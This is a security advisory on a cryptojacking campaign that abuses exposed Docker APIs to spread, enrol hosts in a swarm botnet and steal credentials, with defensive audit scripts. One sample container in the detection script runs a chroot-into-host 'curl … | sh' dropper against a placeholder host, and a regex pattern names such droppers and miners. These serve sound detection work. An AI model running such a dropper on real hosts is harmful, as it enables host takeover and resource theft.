New Cryptojacking Attack Targets Docker API to Create Malicious Swarm Botnet
Summary:
A recent discovery by Datadog Security Research has unveiled a new cryptojacking campaign targeting Docker and Kubernetes, two widely used platforms for containerized workloads. The attackers exploit Docker Engine APIs that are exposed to the internet without authentication to deploy a cryptocurrency miner in containers on the compromised hosts. The campaign then uses additional malicious scripts to achieve lateral movement across the network, compromising other Docker hosts, Kubernetes deployments, and even SSH servers.
The attacker leverages automated scanning tools to identify exposed Docker endpoints and then spawns containers that execute malicious scripts to retrieve and launch the cryptocurrency miner. These scripts are also designed to spread the malware to other systems on the network by scanning for additional Docker and Kubernetes instances with exposed APIs. As the title indicates, compromised hosts are also enrolled in an attacker-controlled Docker Swarm, turning the engine's own orchestration into a botnet. Furthermore, the campaign targets SSH servers, compromising them and adding a backdoor for persistent access. The attackers also steal credentials for cloud and file-sharing services, including AWS, Google Cloud, and Samba, from the compromised systems. The attackers exploit poorly secured Docker configurations to gain initial access, and then weaponize containerization features to orchestrate their attacks and establish a foothold within the target network. The use of automated scanning tools and the ability to switch between different container images hosted on Docker Hub demonstrate the sophistication of this campaign.
Security Officer Comments:
This incident demonstrates the critical need for organizations to prioritize the security of their containerized environments like Docker and Kubernetes, because they remain attractive targets. The use of payloads dedicated to lateral movement indicates the adversary's familiarity with how Docker and Kubernetes instances are deployed in cloud environments and suggests they know the common misconfigurations of these platforms. Attacks like these rely on public-facing Docker API endpoints to deploy their payloads, so they are most likely opportunistic rather than targeted. Initial access therefore depends on a misconfiguration that most organizations should not have, but the malware's ability to spread rapidly once inside still emphasizes the importance of restricting access to Docker Engine APIs, employing strong authentication, segmenting container networks from the rest of the enterprise, and regularly monitoring for suspicious activity.
Suggested Corrections:
IOCs for this campaign are published in the Datadog Security Research article linked below.
Regularly Review Network Configurations: Periodically review your network configurations to ensure that only authorized traffic can access your Docker instance.
- If you're using a cloud provider, place your Docker hosts in a private subnet of a VPC with no public IP address. Being inside a VPC alone does not hide a host; it is the absence of a public address and of a security-group rule allowing inbound 2375/2376 that keeps the API off the internet.
- Create ACLs to restrict inbound and outbound traffic to your Docker instance. Allow only necessary traffic, such as from your management network or other trusted sources.
Restrict Docker Engine API Access:
- Limit access to the Docker Engine API to only authorized users and applications.
- Use network segmentation to isolate Docker hosts from the public internet.
- Implement strong authentication for the Docker Engine API. The daemon has no built-in user accounts or MFA: the only native control for a TCP listener is TLS with client-certificate verification (tlsverify), so either keep the API on the local Unix socket and reach it over SSH, or enable tlsverify and put any interactive/MFA requirement on the SSH or VPN layer in front of it.
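The following script is an added example (not Docker's or Datadog's code) that audits the daemon settings the list above describes. It inspects the `hosts`, `tlsverify` and `tls*` keys that dockerd reads from daemon.json and flags a TCP listener that is unauthenticated or bound to every interface. The two configurations embedded in it are constructed for illustration; the certificate paths and the 10.0.0.5 management address are assumptions.

```python
"""Audit a Docker daemon.json for an exposed Engine API.

Added example, not Docker's own tooling. The WEAK and HARDENED configs
are constructed inputs in the same shape dockerd reads from
/etc/docker/daemon.json; replace the paths/addresses for your hosts.
"""
import json
from urllib.parse import urlsplit

# Constructed: the classic cryptojacking foothold, an unauthenticated
# API on 2375 reachable from any interface.
WEAK = json.loads("""{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}""")

# Constructed: TCP only on the management address, and only for clients
# presenting a certificate signed by our CA. Paths are assumptions.
HARDENED = json.loads("""{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/certs/ca.pem",
  "tlscert": "/etc/docker/certs/server-cert.pem",
  "tlskey": "/etc/docker/certs/server-key.pem"
}""")

# Bind addresses that mean "every interface" (urlsplit gives None for an
# empty host, which we normalise to "").
WILDCARD_BINDS = {"", "0.0.0.0", "::"}
TLS_MATERIAL = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_config(cfg: dict) -> list[str]:
    """Return one finding per insecure property of a daemon.json dict."""
    findings = []
    # dockerd's default when "hosts" is absent is the local Unix socket only.
    hosts = cfg.get("hosts") or ["unix:///var/run/docker.sock"]
    tls_verify = bool(cfg.get("tlsverify"))

    for host in hosts:
        url = urlsplit(host)
        if url.scheme != "tcp":
            continue  # unix:// and fd:// are local to the host
        if not tls_verify:
            if cfg.get("tls"):
                findings.append(
                    f"{host}: 'tls' encrypts the channel but does not "
                    "authenticate clients; set 'tlsverify' instead")
            else:
                findings.append(
                    f"{host}: TCP listener without tlsverify; anyone who "
                    "can reach it can run privileged containers as root")
        elif not all(cfg.get(k) for k in TLS_MATERIAL):
            findings.append(
                f"{host}: tlsverify is set but tlscacert/tlscert/tlskey "
                "are incomplete, so dockerd will fail to start")
        if (url.hostname or "") in WILDCARD_BINDS:
            findings.append(f"{host}: bound to all interfaces")
    return findings


def audit_file(path: str = "/etc/docker/daemon.json") -> list[str]:
    """Convenience wrapper for running against a real host."""
    with open(path, encoding="utf-8") as fh:
        return audit_daemon_config(json.load(fh))


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(f"[{label}]")
        for line in audit_daemon_config(cfg) or ["no findings"]:
            print("  -", line)
```

One practical caveat when applying the hardened config: the stock systemd unit for Docker already passes `-H fd://` on the `dockerd` command line, and dockerd refuses to start if `hosts` is set both as a flag and in daemon.json. Either put the listener in a systemd drop-in that overrides `ExecStart`, or remove `-H fd://` from the unit before adding `hosts` to the file.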
Monitor for Suspicious Activity:
- Use security tools to monitor for anomalous activity, such as unusual network traffic, unauthorized container creation (especially privileged containers or ones that bind-mount the host filesystem), hosts unexpectedly joining a Docker Swarm, or cryptocurrency mining processes.
- Regularly review logs and audit trails for signs of compromise.
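As an added example of the review step above (not part of the original bulletin or of Datadog's tooling), the script below scores the JSON that `docker container inspect` and `docker info --format '{{json .}}'` emit for the patterns this campaign relies on: privileged containers, host root bind mounts, host namespaces, images from unexpected registries, entrypoints that pipe a downloaded script into a shell, and swarm membership under a manager you do not run. The container records, the swarm manager addresses, and the trusted registry prefix are all constructed; the dropper URL and the `xmrig` heuristic are illustrative, not IOCs from the page.

```python
"""Flag containers and swarm state that match Docker API abuse patterns.

Added example, not Datadog's or Docker's code. Inputs have the shape of
`docker container inspect <id>` records and `docker info` JSON; the
samples at the bottom are constructed. Policy values are assumptions.
"""
import re

# Hypothetical policy for this host. Adjust to your environment.
TRUSTED_IMAGE_PREFIXES = ("registry.internal.example/",)
KNOWN_SWARM_MANAGERS = {"10.0.0.5:2377"}

# Dropper / miner heuristics: "curl ... | sh", chroot into a mounted host
# root, or a well-known miner binary name. Illustrative, not an IOC list.
SUSPICIOUS_CMD = re.compile(
    r"(curl|wget)[^|;&]*\|\s*(sh|bash)\b|\bchroot\s+/host\b|\bxmrig\b",
    re.IGNORECASE,
)
SENSITIVE_MOUNT_SOURCES = {"/", "/var/run/docker.sock", "/proc", "/sys"}


def inspect_findings(container: dict) -> list[str]:
    """Findings for one `docker container inspect` record."""
    findings = []
    name = container.get("Name", "?")
    host = container.get("HostConfig") or {}
    cfg = container.get("Config") or {}

    if host.get("Privileged"):
        findings.append(f"{name}: runs --privileged")
    if host.get("PidMode") == "host":
        findings.append(f"{name}: shares the host PID namespace")
    if host.get("NetworkMode") == "host":
        findings.append(f"{name}: shares the host network namespace")
    for bind in host.get("Binds") or []:
        src = bind.split(":", 1)[0]          # Binds are "src:dst[:opts]"
        if src in SENSITIVE_MOUNT_SOURCES:
            findings.append(f"{name}: bind-mounts {src}")

    image = cfg.get("Image", "")
    if not image.startswith(TRUSTED_IMAGE_PREFIXES):
        findings.append(f"{name}: image {image!r} not from a trusted registry")

    cmd = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
    if SUSPICIOUS_CMD.search(cmd):
        findings.append(f"{name}: command looks like a dropper or miner: {cmd!r}")
    return findings


def swarm_findings(info: dict) -> list[str]:
    """Findings from `docker info` JSON: active swarm with a foreign manager."""
    swarm = info.get("Swarm") or {}
    if swarm.get("LocalNodeState") != "active":
        return []
    return [
        f"swarm: node is controlled by unknown manager {mgr.get('Addr', '?')}"
        for mgr in swarm.get("RemoteManagers") or []
        if mgr.get("Addr") not in KNOWN_SWARM_MANAGERS
    ]


# Constructed sample: an ordinary web container from our own registry.
BENIGN = {
    "Name": "/web",
    "Config": {"Image": "registry.internal.example/nginx:1.27",
               "Entrypoint": ["/docker-entrypoint.sh"],
               "Cmd": ["nginx", "-g", "daemon off;"]},
    "HostConfig": {"Privileged": False, "PidMode": "", "NetworkMode": "bridge",
                   "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
}

# Constructed sample of the API-abuse pattern: stock image, host root
# mounted, privileged, entrypoint fetches a script and pipes it to sh.
SUSPICIOUS = {
    "Name": "/romantic_curie",
    "Config": {"Image": "alpine", "Entrypoint": None,
               "Cmd": ["chroot", "/host", "sh", "-c",
                       "curl -s http://example.invalid/init.sh | sh"]},
    "HostConfig": {"Privileged": True, "PidMode": "host",
                   "NetworkMode": "host", "Binds": ["/:/host"]},
}

# Constructed `docker info` fragment: node was joined to someone else's swarm.
ROGUE_INFO = {"Swarm": {"LocalNodeState": "active", "NodeID": "x1",
                        "RemoteManagers": [{"NodeID": "m1", "Addr": "203.0.113.7:2377"}]}}


if __name__ == "__main__":
    for c in (BENIGN, SUSPICIOUS):
        print(c["Name"], inspect_findings(c) or "clean")
    print(swarm_findings(ROGUE_INFO))
```

On a live host, feed it with `docker container inspect $(docker ps -aq)` and `docker info --format '{{json .}}'`; a cron job that diffs the findings against the previous run is a cheap first alert for containers that appeared without a deployment.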
Implement Container Image Scanning:
- Scan container images for malware and vulnerabilities before deploying them.
- Use trusted container registries and enforce image signing to ensure the integrity of container images.
Restrict Credential Exposure:
- Avoid storing sensitive credentials, such as API keys and passwords, in container images, container environment variables, or in plaintext files on the Docker host, since a container with the host filesystem mounted can read all of them.
- Use secure credential management solutions to store and manage credentials.
Link(s):
https://thehackernews.com/2024/10/new-cryptojacking-attack-targets-docker.html
https://securitylabs.datadoghq.com/articles/threat-actors-leveraging-docker-swarm-kubernetes-mine-cryptocurrency/